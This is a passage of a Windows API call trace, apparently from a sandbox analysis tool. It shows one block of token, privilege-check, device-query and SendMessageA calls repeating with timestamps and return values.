wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.844] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.844] GetLastError () returned 0x578 [0084.844] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.844] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.844] GetCurrentThread () returned 0xfffffffe [0084.844] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.844] GetLastError () returned 0x3f0 [0084.844] GetCurrentProcess () returned 0xffffffff [0084.844] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.844] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.844] SetLastError (dwErrCode=0x522) [0084.844] CloseHandle (hObject=0x114) returned 1 [0084.844] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.844] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.844] GetLastError () returned 0x578 [0084.844] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.844] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.844] GetCurrentThread () returned 0xfffffffe [0084.844] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.844] GetLastError () returned 0x3f0 [0084.844] GetCurrentProcess () returned 0xffffffff [0084.844] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.844] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.844] SetLastError (dwErrCode=0x522) [0084.845] CloseHandle (hObject=0x114) returned 1 [0084.845] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.845] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.845] GetLastError () returned 0x578 [0084.845] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.845] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.845] GetCurrentThread () returned 0xfffffffe [0084.845] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.845] GetLastError () returned 0x3f0 [0084.845] GetCurrentProcess () returned 0xffffffff [0084.845] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.845] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.845] SetLastError (dwErrCode=0x522) [0084.845] CloseHandle (hObject=0x114) returned 1 [0084.845] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.845] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.845] GetLastError () returned 0x578 [0084.845] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.845] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.845] GetCurrentThread () returned 0xfffffffe [0084.845] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.845] GetLastError () returned 0x3f0 [0084.845] GetCurrentProcess () returned 0xffffffff [0084.845] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.845] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.845] SetLastError (dwErrCode=0x522) [0084.845] CloseHandle (hObject=0x114) returned 1 [0084.845] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.845] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.845] GetLastError () returned 0x578 [0084.845] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.845] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.845] GetCurrentThread () returned 0xfffffffe [0084.845] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.845] GetLastError () returned 0x3f0 [0084.845] GetCurrentProcess () returned 0xffffffff [0084.845] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.845] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.845] SetLastError (dwErrCode=0x522) [0084.845] CloseHandle (hObject=0x114) returned 1 [0084.845] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.845] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.845] GetLastError () returned 0x578 [0084.845] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.845] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.845] GetCurrentThread () returned 0xfffffffe [0084.845] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.846] GetLastError () returned 0x3f0 [0084.846] GetCurrentProcess () returned 0xffffffff [0084.846] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.846] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.846] SetLastError (dwErrCode=0x522) [0084.846] CloseHandle (hObject=0x114) returned 1 [0084.846] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.846] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.846] GetLastError () returned 0x578 [0084.846] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.846] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.846] GetCurrentThread () returned 0xfffffffe [0084.846] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.846] GetLastError () returned 0x3f0 [0084.846] GetCurrentProcess () returned 0xffffffff [0084.846] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.846] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.846] SetLastError (dwErrCode=0x522) [0084.846] CloseHandle (hObject=0x114) returned 1 [0084.846] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.846] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.846] GetLastError () returned 0x578 [0084.846] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.846] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.846] GetCurrentThread () returned 0xfffffffe [0084.846] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.846] GetLastError () returned 0x3f0 [0084.846] GetCurrentProcess () returned 0xffffffff [0084.846] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.846] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.846] SetLastError (dwErrCode=0x522) [0084.846] CloseHandle (hObject=0x114) returned 1 [0084.846] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.846] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.846] GetLastError () returned 0x578 [0084.846] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.846] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.846] GetCurrentThread () returned 0xfffffffe [0084.846] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.846] GetLastError () returned 0x3f0 [0084.846] GetCurrentProcess () returned 0xffffffff [0084.846] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.846] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.847] SetLastError (dwErrCode=0x522) [0084.847] CloseHandle (hObject=0x114) returned 1 [0084.847] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.847] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.847] GetLastError () returned 0x578 [0084.847] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.847] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.847] GetCurrentThread () returned 0xfffffffe [0084.847] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.847] GetLastError () returned 0x3f0 [0084.847] GetCurrentProcess () returned 0xffffffff [0084.847] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.847] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.847] SetLastError (dwErrCode=0x522) [0084.847] CloseHandle (hObject=0x114) returned 1 [0084.847] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.847] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.847] GetLastError () returned 0x578 [0084.847] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.847] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.847] GetCurrentThread () returned 0xfffffffe [0084.847] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.847] GetLastError () returned 0x3f0 [0084.847] GetCurrentProcess () returned 0xffffffff [0084.847] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.847] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.847] SetLastError (dwErrCode=0x522) [0084.847] CloseHandle (hObject=0x114) returned 1 [0084.847] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.847] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.847] GetLastError () returned 0x578 [0084.847] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.847] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.847] GetCurrentThread () returned 0xfffffffe [0084.847] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.847] GetLastError () returned 0x3f0 [0084.847] GetCurrentProcess () returned 0xffffffff [0084.847] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.847] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.847] SetLastError (dwErrCode=0x522) [0084.847] CloseHandle (hObject=0x114) returned 1 [0084.847] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.847] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.848] GetLastError () returned 0x578 [0084.848] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.848] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.848] GetCurrentThread () returned 0xfffffffe [0084.848] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.848] GetLastError () returned 0x3f0 [0084.848] GetCurrentProcess () returned 0xffffffff [0084.848] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.848] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.848] SetLastError (dwErrCode=0x522) [0084.848] CloseHandle (hObject=0x114) returned 1 [0084.848] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.848] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.848] GetLastError () returned 0x578 [0084.848] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.848] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.848] GetCurrentThread () returned 0xfffffffe [0084.848] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.848] GetLastError () returned 0x3f0 [0084.848] GetCurrentProcess () returned 0xffffffff [0084.848] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.848] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.848] SetLastError (dwErrCode=0x522) [0084.848] CloseHandle (hObject=0x114) returned 1 [0084.848] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.848] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.848] GetLastError () returned 0x578 [0084.848] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.848] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.849] GetCurrentThread () returned 0xfffffffe [0084.849] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.849] GetLastError () returned 0x3f0 [0084.849] GetCurrentProcess () returned 0xffffffff [0084.849] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.849] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.849] SetLastError (dwErrCode=0x522) [0084.849] CloseHandle (hObject=0x114) returned 1 [0084.849] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.849] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.849] GetLastError () returned 0x578 [0084.849] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.849] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.849] GetCurrentThread () returned 0xfffffffe [0084.849] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.849] GetLastError () returned 0x3f0 [0084.849] GetCurrentProcess () returned 0xffffffff [0084.849] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.849] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.849] SetLastError (dwErrCode=0x522) [0084.849] CloseHandle (hObject=0x114) returned 1 [0084.849] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.849] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.849] GetLastError () returned 0x578 [0084.849] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.849] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.849] GetCurrentThread () returned 0xfffffffe [0084.849] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.849] GetLastError () returned 0x3f0 [0084.849] GetCurrentProcess () returned 0xffffffff [0084.849] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.849] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.849] SetLastError (dwErrCode=0x522) [0084.849] CloseHandle (hObject=0x114) returned 1 [0084.849] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.849] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.849] GetLastError () returned 0x578 [0084.849] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.849] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.849] GetCurrentThread () returned 0xfffffffe [0084.849] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.849] GetLastError () returned 0x3f0 [0084.849] GetCurrentProcess () returned 0xffffffff [0084.849] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.849] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.849] SetLastError (dwErrCode=0x522) [0084.849] CloseHandle (hObject=0x114) returned 1 [0084.850] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.850] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.850] GetLastError () returned 0x578 [0084.850] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.850] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.850] GetCurrentThread () returned 0xfffffffe [0084.850] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.850] GetLastError () returned 0x3f0 [0084.850] GetCurrentProcess () returned 0xffffffff [0084.850] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.850] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.850] SetLastError (dwErrCode=0x522) [0084.850] CloseHandle (hObject=0x114) returned 1 [0084.850] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.850] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.850] GetLastError () returned 0x578 [0084.850] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.850] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.850] GetCurrentThread () returned 0xfffffffe [0084.850] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.850] GetLastError () returned 0x3f0 [0084.850] GetCurrentProcess () returned 0xffffffff [0084.850] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.850] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.850] SetLastError (dwErrCode=0x522) [0084.850] CloseHandle (hObject=0x114) returned 1 [0084.850] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.850] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.850] GetLastError () returned 0x578 [0084.850] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.850] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.850] GetCurrentThread () returned 0xfffffffe [0084.850] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.850] GetLastError () returned 0x3f0 [0084.850] GetCurrentProcess () returned 0xffffffff [0084.850] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.850] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.850] SetLastError (dwErrCode=0x522) [0084.850] CloseHandle (hObject=0x114) returned 1 [0084.850] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.850] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.850] GetLastError () returned 0x578 [0084.850] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.850] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.850] GetCurrentThread () returned 0xfffffffe [0084.850] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.850] GetLastError () returned 0x3f0 [0084.850] GetCurrentProcess () returned 0xffffffff [0084.851] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.851] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.851] SetLastError (dwErrCode=0x522) [0084.851] CloseHandle (hObject=0x114) returned 1 